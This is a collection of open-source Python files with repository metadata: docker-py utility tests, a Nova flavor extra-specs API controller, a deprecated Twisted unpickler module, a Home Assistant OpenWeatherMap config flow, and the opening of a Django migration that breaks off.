ulimit_obj = config['Ulimits'][0]
self.assertTrue(isinstance(ulimit_obj, Ulimit))
self.assertEqual(ulimit_obj.name, ulimit_dct['name'])
self.assertEqual(ulimit_obj.soft, ulimit_dct['soft'])
self.assertEqual(ulimit_obj['Soft'], ulimit_obj.soft)
def test_create_host_config_dict_ulimit_capitals(self):
ulimit_dct = {'Name': 'nofile', 'Soft': 8096, 'Hard': 8096 * 4}
config = create_host_config(
ulimits=[ulimit_dct], version=DEFAULT_DOCKER_API_VERSION
)
self.assertIn('Ulimits', config)
self.assertEqual(len(config['Ulimits']), 1)
ulimit_obj = config['Ulimits'][0]
self.assertTrue(isinstance(ulimit_obj, Ulimit))
self.assertEqual(ulimit_obj.name, ulimit_dct['Name'])
self.assertEqual(ulimit_obj.soft, ulimit_dct['Soft'])
self.assertEqual(ulimit_obj.hard, ulimit_dct['Hard'])
self.assertEqual(ulimit_obj['Soft'], ulimit_obj.soft)
def test_create_host_config_obj_ulimit(self):
ulimit_dct = Ulimit(name='nofile', soft=8096)
config = create_host_config(
ulimits=[ulimit_dct], version=DEFAULT_DOCKER_API_VERSION
)
self.assertIn('Ulimits', config)
self.assertEqual(len(config['Ulimits']), 1)
ulimit_obj = config['Ulimits'][0]
self.assertTrue(isinstance(ulimit_obj, Ulimit))
self.assertEqual(ulimit_obj, ulimit_dct)
def test_ulimit_invalid_type(self):
self.assertRaises(ValueError, lambda: Ulimit(name=None))
self.assertRaises(ValueError, lambda: Ulimit(name='hello', soft='123'))
self.assertRaises(ValueError, lambda: Ulimit(name='hello', hard='456'))
class LogConfigTest(base.BaseTestCase):
def test_create_host_config_dict_logconfig(self):
dct = {'type': LogConfig.types.SYSLOG, 'config': {'key1': 'val1'}}
config = create_host_config(
version=DEFAULT_DOCKER_API_VERSION, log_config=dct
)
self.assertIn('LogConfig', config)
self.assertTrue(isinstance(config['LogConfig'], LogConfig))
self.assertEqual(dct['type'], config['LogConfig'].type)
def test_create_host_config_obj_logconfig(self):
obj = LogConfig(type=LogConfig.types.SYSLOG, config={'key1': 'val1'})
config = create_host_config(
version=DEFAULT_DOCKER_API_VERSION, log_config=obj
)
self.assertIn('LogConfig', config)
self.assertTrue(isinstance(config['LogConfig'], LogConfig))
self.assertEqual(obj, config['LogConfig'])
def test_logconfig_invalid_config_type(self):
with pytest.raises(ValueError):
LogConfig(type=LogConfig.types.JSON, config='helloworld')
class KwargsFromEnvTest(base.BaseTestCase):
def setUp(self):
self.os_environ = os.environ.copy()
def tearDown(self):
os.environ = self.os_environ
def test_kwargs_from_env_empty(self):
os.environ.update(DOCKER_HOST='',
DOCKER_CERT_PATH='',
DOCKER_TLS_VERIFY='')
kwargs = kwargs_from_env()
self.assertEqual(None, kwargs.get('base_url'))
self.assertEqual(None, kwargs.get('tls'))
def test_kwargs_from_env_tls(self):
os.environ.update(DOCKER_HOST='tcp://192.168.59.103:2376',
DOCKER_CERT_PATH=TEST_CERT_DIR,
DOCKER_TLS_VERIFY='1')
kwargs = kwargs_from_env(assert_hostname=False)
self.assertEqual('https://192.168.59.103:2376', kwargs['base_url'])
self.assertTrue('ca.pem' in kwargs['tls'].verify)
self.assertTrue('cert.pem' in kwargs['tls'].cert[0])
self.assertTrue('key.pem' in kwargs['tls'].cert[1])
self.assertEqual(False, kwargs['tls'].assert_hostname)
try:
client = Client(**kwargs)
self.assertEqual(kwargs['base_url'], client.base_url)
self.assertEqual(kwargs['tls'].verify, client.verify)
self.assertEqual(kwargs['tls'].cert, client.cert)
except TypeError as e:
self.fail(e)
def test_kwargs_from_env_no_cert_path(self):
try:
temp_dir = tempfile.mkdtemp()
cert_dir = os.path.join(temp_dir, '.docker')
shutil.copytree(TEST_CERT_DIR, cert_dir)
os.environ.update(HOME=temp_dir,
DOCKER_CERT_PATH='',
DOCKER_TLS_VERIFY='1')
kwargs = kwargs_from_env()
self.assertIn(cert_dir, kwargs['tls'].verify)
self.assertIn(cert_dir, kwargs['tls'].cert[0])
self.assertIn(cert_dir, kwargs['tls'].cert[1])
finally:
if temp_dir:
shutil.rmtree(temp_dir)
class UtilsTest(base.BaseTestCase):
longMessage = True
def generate_tempfile(self, file_content=None):
"""
Generates a temporary file for tests with the content
of 'file_content' and returns the filename.
Don't forget to unlink the file with os.unlink() after.
"""
local_tempfile = tempfile.NamedTemporaryFile(delete=False)
local_tempfile.write(file_content.encode('UTF-8'))
local_tempfile.close()
return local_tempfile.name
def test_convert_volume_binds_empty(self):
self.assertEqual(convert_volume_binds({}), [])
self.assertEqual(convert_volume_binds([]), [])
def test_convert_volume_binds_list(self):
data = ['/a:/a:ro', '/b:/c:z']
self.assertEqual(convert_volume_binds(data), data)
def test_convert_volume_binds_complete(self):
data = {
'/mnt/vol1': {
'bind': '/data',
'mode': 'ro'
}
}
self.assertEqual(convert_volume_binds(data), ['/mnt/vol1:/data:ro'])
def test_convert_volume_binds_compact(self):
data = {
'/mnt/vol1': '/data'
}
self.assertEqual(convert_volume_binds(data), ['/mnt/vol1:/data:rw'])
def test_convert_volume_binds_no_mode(self):
data = {
'/mnt/vol1': {
'bind': '/data'
}
}
self.assertEqual(convert_volume_binds(data), ['/mnt/vol1:/data:rw'])
def test_convert_volume_binds_unicode_bytes_input(self):
if six.PY2:
expected = [unicode('/mnt/지연:/unicode/박:rw', 'utf-8')]
data = {
'/mnt/지연': {
'bind': '/unicode/박',
'mode': 'rw'
}
}
self.assertEqual(
convert_volume_binds(data), expected
)
else:
expected = ['/mnt/지연:/unicode/박:rw']
data = {
bytes('/mnt/지연', 'utf-8'): {
'bind': bytes('/unicode/박', 'utf-8'),
'mode': 'rw'
}
}
self.assertEqual(
convert_volume_binds(data), expected
)
def test_convert_volume_binds_unicode_unicode_input(self):
if six.PY2:
expected = [unicode('/mnt/지연:/unicode/박:rw', 'utf-8')]
data = {
unicode('/mnt/지연', 'utf-8'): {
'bind': unicode('/unicode/박', 'utf-8'),
'mode': 'rw'
}
}
self.assertEqual(
convert_volume_binds(data), expected
)
else:
expected = ['/mnt/지연:/unicode/박:rw']
data = {
'/mnt/지연': {
'bind': '/unicode/박',
'mode': 'rw'
}
}
self.assertEqual(
convert_volume_binds(data), expected
)
def test_parse_repository_tag(self):
self.assertEqual(parse_repository_tag("root"),
("root", None))
self.assertEqual(parse_repository_tag("root:tag"),
("root", "tag"))
self.assertEqual(parse_repository_tag("user/repo"),
("user/repo", None))
self.assertEqual(parse_repository_tag("user/repo:tag"),
("user/repo", "tag"))
self.assertEqual(parse_repository_tag("url:5000/repo"),
("url:5000/repo", None))
self.assertEqual(parse_repository_tag("url:5000/repo:tag"),
("url:5000/repo", "tag"))
def test_parse_bytes(self):
self.assertEqual(parse_bytes("512MB"), (536870912))
self.assertEqual(parse_bytes("512M"), (536870912))
self.assertRaises(DockerException, parse_bytes, "512MK")
self.assertRaises(DockerException, parse_bytes, "512L")
def test_parse_host(self):
invalid_hosts = [
'0.0.0.0',
'tcp://',
'udp://127.0.0.1',
'udp://127.0.0.1:2375',
]
valid_hosts = {
'0.0.0.1:5555': 'http://0.0.0.1:5555',
':6666': 'http://127.0.0.1:6666',
'tcp://:7777': 'http://127.0.0.1:7777',
'http://:7777': 'http://127.0.0.1:7777',
'https://kokia.jp:2375': 'https://kokia.jp:2375',
'unix:///var/run/docker.sock': 'http+unix:///var/run/docker.sock',
'unix://': 'http+unix://var/run/docker.sock',
'somehost.net:80/service/swarm': (
'http://somehost.net:80/service/swarm'
),
}
for host in invalid_hosts:
with pytest.raises(DockerException):
parse_host(host, None)
for host, expected in valid_hosts.items():
self.assertEqual(parse_host(host, None), expected, msg=host)
def test_parse_host_empty_value(self):
unix_socket = 'http+unix://var/run/docker.sock'
tcp_port = 'http://127.0.0.1:2375'
for val in [None, '']:
for platform in ['darwin', 'linux2', None]:
assert parse_host(val, platform) == unix_socket
assert parse_host(val, 'win32') == tcp_port
def test_parse_env_file_proper(self):
env_file = self.generate_tempfile(
file_content='USER=jdoe\nPASS=secret')
get_parse_env_file = parse_env_file(env_file)
self.assertEqual(get_parse_env_file,
{'USER': 'jdoe', 'PASS': 'secret'})
os.unlink(env_file)
def test_parse_env_file_commented_line(self):
env_file = self.generate_tempfile(
file_content='USER=jdoe\n#PASS=secret')
get_parse_env_file = parse_env_file((env_file))
self.assertEqual(get_parse_env_file, {'USER': 'jdoe'})
os.unlink(env_file)
def test_parse_env_file_invalid_line(self):
env_file = self.generate_tempfile(
file_content='USER jdoe')
self.assertRaises(
DockerException, parse_env_file, env_file)
os.unlink(env_file)
def test_convert_filters(self):
tests = [
({'dangling': True}, '{"dangling": ["true"]}'),
({'dangling': "true"}, '{"dangling": ["true"]}'),
({'exited': 0}, '{"exited": [0]}'),
({'exited': [0, 1]}, '{"exited": [0, 1]}'),
]
for filters, expected in tests:
self.assertEqual(convert_filters(filters), expected)
def test_decode_json_header(self):
obj = {'a': 'b', 'c': 1}
data = None
if six.PY3:
data = base64.urlsafe_b64encode(bytes(json.dumps(obj), 'utf-8'))
else:
data = base64.urlsafe_b64encode(json.dumps(obj))
decoded_data = decode_json_header(data)
self.assertEqual(obj, decoded_data)
def test_803_urlsafe_encode(self):
auth_data = {
'username': 'root',
'password': 'GR?XGR?XGR?XGR?X'
}
encoded = encode_header(auth_data)
assert b'/' not in encoded
assert b'_' in encoded
def test_resolve_repository_name(self):
# docker hub library image
self.assertEqual(
resolve_repository_name('image'),
('index.docker.io', 'image'),
)
# docker hub image
self.assertEqual(
resolve_repository_name('username/image'),
('index.docker.io', 'username/image'),
)
# private registry
self.assertEqual(
resolve_repository_name('my.registry.net/image'),
('my.registry.net', 'image'),
)
# private registry with port
self.assertEqual(
resolve_repository_name('my.registry.net:5000/image'),
('my.registry.net:5000', 'image'),
)
# private registry with username
self.assertEqual(
resolve_repository_name('my.registry.net/username/image'),
('my.registry.net', 'username/image'),
)
# no dots but port
self.assertEqual(
resolve_repository_name('hostname:5000/image'),
('hostname:5000', 'image'),
)
# no dots but port and username
self.assertEqual(
resolve_repository_name('hostname:5000/username/image'),
('hostname:5000', 'username/image'),
)
# localhost
self.assertEqual(
resolve_repository_name('localhost/image'),
('localhost', 'image'),
)
# localhost with username
self.assertEqual(
resolve_repository_name('localhost/username/image'),
('localhost', 'username/image'),
)
def test_resolve_authconfig(self):
auth_config = {
'https://index.docker.io/v1/': {'auth': 'indexuser'},
'my.registry.net': {'auth': 'privateuser'},
'http://legacy.registry.url/v1/': {'auth': 'legacyauth'}
}
# hostname only
self.assertEqual(
resolve_authconfig(auth_config, 'my.registry.net'),
{'auth': 'privateuser'}
)
# no protocol
self.assertEqual(
resolve_authconfig(auth_config, 'my.registry.net/v1/'),
{'auth': 'privateuser'}
)
# no path
self.assertEqual(
resolve_authconfig(auth_config, 'http://my.registry.net'),
{'auth': 'privateuser'}
)
# no path, trailing slash
self.assertEqual(
resolve_authconfig(auth_config, 'http://my.registry.net/'),
{'auth': 'privateuser'}
)
# no path, wrong secure protocol
self.assertEqual(
resolve_authconfig(auth_config, 'https://my.registry.net'),
{'auth': 'privateuser'}
)
# no path, wrong insecure protocol
self.assertEqual(
resolve_authconfig(auth_config, 'http://index.docker.io'),
{'auth': 'indexuser'}
)
# with path, wrong protocol
self.assertEqual(
resolve_authconfig(auth_config, 'https://my.registry.net/v1/'),
{'auth': 'privateuser'}
)
# default registry
self.assertEqual(
resolve_authconfig(auth_config), {'auth': 'indexuser'}
)
# default registry (explicit None)
self.assertEqual(
resolve_authconfig(auth_config, None), {'auth': 'indexuser'}
)
# fully explicit
self.assertEqual(
resolve_authconfig(auth_config, 'http://my.registry.net/v1/'),
{'auth': 'privateuser'}
)
# legacy entry in config
self.assertEqual(
resolve_authconfig(auth_config, 'legacy.registry.url'),
{'auth': 'legacyauth'}
)
# no matching entry
self.assertTrue(
resolve_authconfig(auth_config, 'does.not.exist') is None
)
def test_resolve_registry_and_auth(self):
auth_config = {
'https://index.docker.io/v1/': {'auth': 'indexuser'},
'my.registry.net': {'auth': 'privateuser'},
}
# library image
image = 'image'
self.assertEqual(
resolve_authconfig(auth_config, resolve_repository_name(image)[0]),
{'auth': 'indexuser'},
)
# docker hub image
image = 'username/image'
self.assertEqual(
resolve_authconfig(auth_config, resolve_repository_name(image)[0]),
{'auth': 'indexuser'},
)
# private registry
image = 'my.registry.net/image'
self.assertEqual(
resolve_authconfig(auth_config, resolve_repository_name(image)[0]),
{'auth': 'privateuser'},
)
# unauthenticated registry
image = 'other.registry.net/image'
self.assertEqual(
resolve_authconfig(auth_config, resolve_repository_name(image)[0]),
None,
)
class PortsTest(base.BaseTestCase):
def test_split_port_with_host_ip(self):
internal_port, external_port = split_port("127.0.0.1:1000:2000")
self.assertEqual(internal_port, ["2000"])
self.assertEqual(external_port, [("127.0.0.1", "1000")])
def test_split_port_with_protocol(self):
internal_port, external_port = split_port("127.0.0.1:1000:2000/udp")
self.assertEqual(internal_port, ["2000/udp"])
self.assertEqual(external_port, [("127.0.0.1", "1000")])
def test_split_port_with_host_ip_no_port(self):
internal_port, external_port = split_port("127.0.0.1::2000")
self.assertEqual(internal_port, ["2000"])
self.assertEqual(external_port, [("127.0.0.1", None)])
def test_split_port_range_with_host_ip_no_port(self):
internal_port, external_port = split_port("127.0.0.1::2000-2001")
self.assertEqual(internal_port, ["2000", "2001"])
self.assertEqual(external_port,
[("127.0.0.1", None), ("127.0.0.1", None)])
def test_split_port_with_host_port(self):
internal_port, external_port = split_port("1000:2000")
self.assertEqual(internal_port, ["2000"])
self.assertEqual(external_port, ["1000"])
def test_split_port_range_with_host_port(self):
internal_port, external_port = split_port("1000-1001:2000-2001")
self.assertEqual(internal_port, ["2000", "2001"])
self.assertEqual(external_port, ["1000", "1001"])
def test_split_port_no_host_port(self):
internal_port, external_port = split_port("2000")
self.assertEqual(internal_port, ["2000"])
self.assertEqual(external_port, None)
def test_split_port_range_no_host_port(self):
internal_port, external_port = split_port("2000-2001")
self.assertEqual(internal_port, ["2000", "2001"])
self.assertEqual(external_port, None)
def test_split_port_range_with_protocol(self):
internal_port, external_port = split_port(
"127.0.0.1:1000-1001:2000-2001/udp")
self.assertEqual(internal_port, ["2000/udp", "2001/udp"])
self.assertEqual(external_port,
[("127.0.0.1", "1000"), ("127.0.0.1", "1001")])
def test_split_port_invalid(self):
self.assertRaises(ValueError,
lambda: split_port("0.0.0.0:1000:2000:tcp"))
def test_non_matching_length_port_ranges(self):
self.assertRaises(
ValueError,
lambda: split_port("0.0.0.0:1000-1010:2000-2002/tcp")
)
def test_port_and_range_invalid(self):
self.assertRaises(ValueError,
lambda: split_port("0.0.0.0:1000:2000-2002/tcp"))
def test_port_only_with_colon(self):
self.assertRaises(ValueError,
lambda: split_port(":80"))
def test_host_only_with_colon(self):
self.assertRaises(ValueError,
lambda: split_port("localhost:"))
def test_build_port_bindings_with_one_port(self):
port_bindings = build_port_bindings(["127.0.0.1:1000:1000"])
self.assertEqual(port_bindings["1000"], [("127.0.0.1", "1000")])
def test_build_port_bindings_with_matching_internal_ports(self):
port_bindings = build_port_bindings(
["127.0.0.1:1000:1000", "127.0.0.1:2000:1000"])
self.assertEqual(port_bindings["1000"],
[("127.0.0.1", "1000"), ("127.0.0.1", "2000")])
def test_build_port_bindings_with_nonmatching_internal_ports(self):
port_bindings = build_port_bindings(
["127.0.0.1:1000:1000", "127.0.0.1:2000:2000"])
self.assertEqual(port_bindings["1000"], [("127.0.0.1", "1000")])
self.assertEqual(port_bindings["2000"], [("127.0.0.1", "2000")])
def test_build_port_bindings_with_port_range(self):
port_bindings = build_port_bindings(["127.0.0.1:1000-1001:1000-1001"])
self.assertEqual(port_bindings["1000"], [("127.0.0.1", "1000")])
self.assertEqual(port_bindings["1001"], [("127.0.0.1", "1001")])
def test_build_port_bindings_with_matching_internal_port_ranges(self):
port_bindings = build_port_bindings(
["127.0.0.1:1000-1001:1000-1001", "127.0.0.1:2000-2001:1000-1001"])
self.assertEqual(port_bindings["1000"],
[("127.0.0.1", "1000"), ("127.0.0.1", "2000")])
self.assertEqual(port_bindings["1001"],
[("127.0.0.1", "1001"), ("127.0.0.1", "2001")])
def test_build_port_bindings_with_nonmatching_internal_port_ranges(self):
port_bindings = build_port_bindings(
["127.0.0.1:1000:1000", "127.0.0.1:2000:2000"])
self.assertEqual(port_bindings["1000"], [("127.0.0.1", "1000")])
self.assertEqual(port_bindings["2000"], [("127.0.0.1", "2000")])
class ExcludePathsTest(base.BaseTestCase):
dirs = [
'foo',
'foo/bar',
'bar',
]
files = [
'Dockerfile',
'Dockerfile.alt',
'.dockerignore',
'a.py',
'a.go',
'b.py',
'cde.py',
'foo/a.py',
'foo/b.py',
'foo/bar/a.py',
'bar/a.py',
]
all_paths = set(dirs + files)
def setUp(self):
self.base = make_tree(self.dirs, self.files)
def tearDown(self):
shutil.rmtree(self.base)
def exclude(self, patterns, dockerfile=None):
return set(exclude_paths(self.base, patterns, dockerfile=dockerfile))
def test_no_excludes(self):
assert self.exclude(['']) == self.all_paths
def test_no_dupes(self):
paths = exclude_paths(self.base, ['!a.py'])
assert sorted(paths) == sorted(set(paths))
def test_wildcard_exclude(self):
assert self.exclude(['*']) == set(['Dockerfile', '.dockerignore'])
def test_exclude_dockerfile_dockerignore(self):
"""
Even if the .dockerignore file explicitly says to exclude
Dockerfile and/or .dockerignore, don't exclude them from
the actual tar file.
"""
assert self.exclude(['Dockerfile', '.dockerignore']) == self.all_paths
def test_exclude_custom_dockerfile(self):
"""
If we're using a custom Dockerfile, make sure that's not
excluded.
"""
assert self.exclude(['*'], dockerfile='Dockerfile.alt') == \
set(['Dockerfile.alt', '.dockerignore'])
def test_single_filename(self):
assert self.exclude(['a.py']) == self.all_paths - set(['a.py'])
# As odd as it sounds, a filename pattern with a trailing slash on the
# end *will* result in that file being excluded.
def test_single_filename_trailing_slash(self):
assert self.exclude(['a.py/']) == self.all_paths - set(['a.py'])
def test_wildcard_filename_start(self):
assert self.exclude(['*.py']) == self.all_paths - set([
'a.py', 'b.py', 'cde.py',
])
def test_wildcard_with_exception(self):
assert self.exclude(['*.py', '!b.py']) == self.all_paths - set([
'a.py', 'cde.py',
])
def test_wildcard_with_wildcard_exception(self):
assert self.exclude(['*.*', '!*.go']) == self.all_paths - set([
'a.py', 'b.py', 'cde.py', 'Dockerfile.alt',
])
def test_wildcard_filename_end(self):
assert self.exclude(['a.*']) == self.all_paths - set(['a.py', 'a.go'])
def test_question_mark(self):
assert self.exclude(['?.py']) == self.all_paths - set(['a.py', 'b.py'])
def test_single_subdir_single_filename(self):
assert self.exclude(['foo/a.py']) == self.all_paths - set(['foo/a.py'])
def test_single_subdir_wildcard_filename(self):
assert self.exclude(['foo/*.py']) == self.all_paths - set([
'foo/a.py', 'foo/b.py',
])
def test_wildcard_subdir_single_filename(self):
assert self.exclude(['*/a.py']) == self.all_paths - set([
'foo/a.py', 'bar/a.py',
])
def test_wildcard_subdir_wildcard_filename(self):
assert self.exclude(['*/*.py']) == self.all_paths - set([
'foo/a.py', 'foo/b.py', 'bar/a.py',
])
def test_directory(self):
assert self.exclude(['foo']) == self.all_paths - set([
'foo', 'foo/a.py', 'foo/b.py',
'foo/bar', 'foo/bar/a.py',
])
def test_directory_with_trailing_slash(self):
assert self.exclude(['foo']) == self.all_paths - set([
'foo', 'foo/a.py', 'foo/b.py',
'foo/bar', 'foo/bar/a.py',
])
def test_directory_with_single_exception(self):
assert self.exclude(['foo', '!foo/bar/a.py']) == self.all_paths - set([
'foo/a.py', 'foo/b.py',
])
def test_directory_with_subdir_exception(self):
assert self.exclude(['foo', '!foo/bar']) == self.all_paths - set([
'foo/a.py', 'foo/b.py',
])
def test_directory_with_wildcard_exception(self):
assert self.exclude(['foo', '!foo/*.py']) == self.all_paths - set([
'foo/bar', 'foo/bar/a.py',
])
def test_subdirectory(self):
assert self.exclude(['foo/bar']) == self.all_paths - set([
'foo/bar', 'foo/bar/a.py',
])
| {
"content_hash": "600332e6927ea7e23b95db806a2545b4",
"timestamp": "",
"source": "github",
"line_count": 792,
"max_line_length": 79,
"avg_line_length": 35.96590909090909,
"alnum_prop": 0.5615938213094611,
"repo_name": "shakamunyi/docker-py",
"id": "04183f9f8718b95283807f72d9429d8b9de9d6d5",
"size": "28533",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tests/utils_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Makefile",
"bytes": "3231"
},
{
"name": "Python",
"bytes": "1156437"
},
{
"name": "Shell",
"bytes": "749"
}
],
"symlink_target": ""
} |
import webob
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova.api.openstack import xmlutil
from nova import db
from nova import exception
from nova.openstack.common.db import exception as db_exc
from nova.openstack.common.gettextutils import _
class ExtraSpecsTemplate(xmlutil.TemplateBuilder):
def construct(self):
extra_specs_dict = xmlutil.make_flat_dict('extra_specs', colon_ns=True)
return xmlutil.MasterTemplate(extra_specs_dict, 1)
class ExtraSpecTemplate(xmlutil.TemplateBuilder):
def construct(self):
sel = xmlutil.Selector(xmlutil.get_items, 0)
root = xmlutil.TemplateElement('extra_spec', selector=sel)
root.set('key', 0)
root.text = 1
return xmlutil.MasterTemplate(root, 1)
class FlavorExtraSpecsController(object):
"""The flavor extra specs API controller for the OpenStack API."""
ALIAS = 'flavor-extra-specs'
def __init__(self, *args, **kwargs):
super(FlavorExtraSpecsController, self).__init__(*args, **kwargs)
self.authorize = extensions.extension_authorizer('compute',
'v3:' + self.ALIAS)
def _get_extra_specs(self, context, flavor_id):
extra_specs = db.flavor_extra_specs_get(context, flavor_id)
return dict(extra_specs=extra_specs)
def _check_body(self, body):
if body is None or body == "":
expl = _('No Request Body')
raise webob.exc.HTTPBadRequest(explanation=expl)
@wsgi.serializers(xml=ExtraSpecsTemplate)
def index(self, req, flavor_id):
"""Returns the list of extra specs for a given flavor."""
context = req.environ['nova.context']
self.authorize(context, action='index')
return self._get_extra_specs(context, flavor_id)
@wsgi.serializers(xml=ExtraSpecsTemplate)
@wsgi.response(201)
def create(self, req, flavor_id, body):
context = req.environ['nova.context']
self.authorize(context, action='create')
self._check_body(body)
specs = body.get('extra_specs', {})
if not specs or type(specs) is not dict:
raise webob.exc.HTTPBadRequest(_('No or bad extra_specs provided'))
try:
db.flavor_extra_specs_update_or_create(context, flavor_id,
specs)
except db_exc.DBDuplicateEntry as error:
raise webob.exc.HTTPBadRequest(explanation=error.format_message())
return body
@wsgi.serializers(xml=ExtraSpecTemplate)
def update(self, req, flavor_id, id, body):
context = req.environ['nova.context']
self.authorize(context, action='update')
self._check_body(body)
if id not in body:
expl = _('Request body and URI mismatch')
raise webob.exc.HTTPBadRequest(explanation=expl)
if len(body) > 1:
expl = _('Request body contains too many items')
raise webob.exc.HTTPBadRequest(explanation=expl)
try:
db.flavor_extra_specs_update_or_create(context, flavor_id,
body)
except db_exc.DBDuplicateEntry as error:
raise webob.exc.HTTPBadRequest(explanation=error.format_message())
return body
@wsgi.serializers(xml=ExtraSpecTemplate)
def show(self, req, flavor_id, id):
"""Return a single extra spec item."""
context = req.environ['nova.context']
self.authorize(context, action='show')
try:
extra_spec = db.flavor_extra_specs_get_item(context,
flavor_id, id)
return extra_spec
except exception.InstanceTypeExtraSpecsNotFound as e:
raise webob.exc.HTTPNotFound(explanation=e.format_message())
@wsgi.response(204)
@extensions.expected_errors(404)
def delete(self, req, flavor_id, id):
"""Deletes an existing extra spec."""
context = req.environ['nova.context']
self.authorize(context, action='delete')
try:
db.flavor_extra_specs_delete(context, flavor_id, id)
except exception.InstanceTypeExtraSpecsNotFound as e:
raise webob.exc.HTTPNotFound(explanation=e.format_message())
class FlavorsExtraSpecs(extensions.V3APIExtensionBase):
"""Flavors Extension."""
name = 'FlavorsExtraSpecs'
alias = FlavorExtraSpecsController.ALIAS
namespace = "http://docs.openstack.org/compute/core/%s/v3" % alias
version = 1
def get_resources(self):
extra_specs = extensions.ResourceExtension(
self.alias,
FlavorExtraSpecsController(),
parent=dict(member_name='flavor', collection_name='flavors'))
return [extra_specs]
def get_controller_extensions(self):
return []
| {
"content_hash": "0438665eefabd6f8171e27df9749dfcd",
"timestamp": "",
"source": "github",
"line_count": 126,
"max_line_length": 79,
"avg_line_length": 39.20634920634921,
"alnum_prop": 0.6246963562753036,
"repo_name": "imsplitbit/nova",
"id": "39deab8024431f45367015041ce070bd731e2c2f",
"size": "5621",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "nova/api/openstack/compute/plugins/v3/flavors_extraspecs.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "13518591"
},
{
"name": "Shell",
"bytes": "16950"
}
],
"symlink_target": ""
} |
"""
I contain ResourceUnpickler, which will unpickle any python object
named with the file extension .trp.
"""
import warnings
from pickle import Unpickler
_msg = ("is deprecated as of Twisted 9.0. Resource persistence "
"is beyond the scope of Twisted Web.")
warnings.warn("twisted.web.trp " + _msg , DeprecationWarning, stacklevel=2)
def ResourceUnpickler(path, registry = None):
warnings.warn(
"twisted.web.trp.ResourceUnpickler " + _msg ,
DeprecationWarning, stacklevel=2)
fl = open(path)
result = Unpickler(fl).load()
return result
| {
"content_hash": "8514fb999f8a417b399ddf89f71ee88a",
"timestamp": "",
"source": "github",
"line_count": 20,
"max_line_length": 75,
"avg_line_length": 29.1,
"alnum_prop": 0.7027491408934707,
"repo_name": "movmov/cc",
"id": "e9cfcd3fd5cec904587be59dfa5096071d99d377",
"size": "665",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "vendor/Twisted-10.0.0/twisted/web/trp.py",
"mode": "33188",
"license": "apache-2.0",
"language": [],
"symlink_target": ""
} |
"""Config flow for OpenWeatherMap."""
from __future__ import annotations
from pyowm import OWM
from pyowm.commons.exceptions import APIRequestError, UnauthorizedError
import voluptuous as vol
from homeassistant import config_entries
from homeassistant.const import (
CONF_API_KEY,
CONF_LATITUDE,
CONF_LONGITUDE,
CONF_MODE,
CONF_NAME,
)
from homeassistant.core import callback
import homeassistant.helpers.config_validation as cv
from .const import (
CONF_LANGUAGE,
CONFIG_FLOW_VERSION,
DEFAULT_FORECAST_MODE,
DEFAULT_LANGUAGE,
DEFAULT_NAME,
DOMAIN,
FORECAST_MODES,
LANGUAGES,
)
class OpenWeatherMapConfigFlow(config_entries.ConfigFlow, domain=DOMAIN):
"""Config flow for OpenWeatherMap."""
VERSION = CONFIG_FLOW_VERSION
@staticmethod
@callback
def async_get_options_flow(
config_entry: config_entries.ConfigEntry,
) -> OpenWeatherMapOptionsFlow:
"""Get the options flow for this handler."""
return OpenWeatherMapOptionsFlow(config_entry)
async def async_step_user(self, user_input=None):
"""Handle a flow initialized by the user."""
errors = {}
if user_input is not None:
latitude = user_input[CONF_LATITUDE]
longitude = user_input[CONF_LONGITUDE]
await self.async_set_unique_id(f"{latitude}-{longitude}")
self._abort_if_unique_id_configured()
try:
api_online = await _is_owm_api_online(
self.hass, user_input[CONF_API_KEY], latitude, longitude
)
if not api_online:
errors["base"] = "invalid_api_key"
except UnauthorizedError:
errors["base"] = "invalid_api_key"
except APIRequestError:
errors["base"] = "cannot_connect"
if not errors:
return self.async_create_entry(
title=user_input[CONF_NAME], data=user_input
)
schema = vol.Schema(
{
vol.Required(CONF_API_KEY): str,
vol.Optional(CONF_NAME, default=DEFAULT_NAME): str,
vol.Optional(
CONF_LATITUDE, default=self.hass.config.latitude
): cv.latitude,
vol.Optional(
CONF_LONGITUDE, default=self.hass.config.longitude
): cv.longitude,
vol.Optional(CONF_MODE, default=DEFAULT_FORECAST_MODE): vol.In(
FORECAST_MODES
),
vol.Optional(CONF_LANGUAGE, default=DEFAULT_LANGUAGE): vol.In(
LANGUAGES
),
}
)
return self.async_show_form(step_id="user", data_schema=schema, errors=errors)
class OpenWeatherMapOptionsFlow(config_entries.OptionsFlow):
"""Handle options."""
def __init__(self, config_entry: config_entries.ConfigEntry) -> None:
"""Initialize options flow."""
self.config_entry = config_entry
async def async_step_init(self, user_input=None):
"""Manage the options."""
if user_input is not None:
return self.async_create_entry(title="", data=user_input)
return self.async_show_form(
step_id="init",
data_schema=self._get_options_schema(),
)
def _get_options_schema(self):
return vol.Schema(
{
vol.Optional(
CONF_MODE,
default=self.config_entry.options.get(
CONF_MODE,
self.config_entry.data.get(CONF_MODE, DEFAULT_FORECAST_MODE),
),
): vol.In(FORECAST_MODES),
vol.Optional(
CONF_LANGUAGE,
default=self.config_entry.options.get(
CONF_LANGUAGE,
self.config_entry.data.get(CONF_LANGUAGE, DEFAULT_LANGUAGE),
),
): vol.In(LANGUAGES),
}
)
async def _is_owm_api_online(hass, api_key, lat, lon):
owm = OWM(api_key).weather_manager()
return await hass.async_add_executor_job(owm.weather_at_coords, lat, lon)
| {
"content_hash": "9e8bb6532f951cd388f45a85cf9d9f69",
"timestamp": "",
"source": "github",
"line_count": 133,
"max_line_length": 86,
"avg_line_length": 32.18796992481203,
"alnum_prop": 0.5631861714552675,
"repo_name": "nkgilley/home-assistant",
"id": "c418231946f41848e1b313124b578950d1fbe95f",
"size": "4281",
"binary": false,
"copies": "3",
"ref": "refs/heads/dev",
"path": "homeassistant/components/openweathermap/config_flow.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "2963"
},
{
"name": "PLSQL",
"bytes": "840"
},
{
"name": "Python",
"bytes": "51597279"
},
{
"name": "Shell",
"bytes": "6252"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
from django.db import models, migrations
import form.models
class Migration(migrations.Migration):
dependencies = [
('form', '0016_auto_20160620_0006'),
]
operations = [
migrations.RemoveField(
model_name='packagecomparison',
name='likert_quality',
),
migrations.RemoveField(
model_name='packagecomparison',
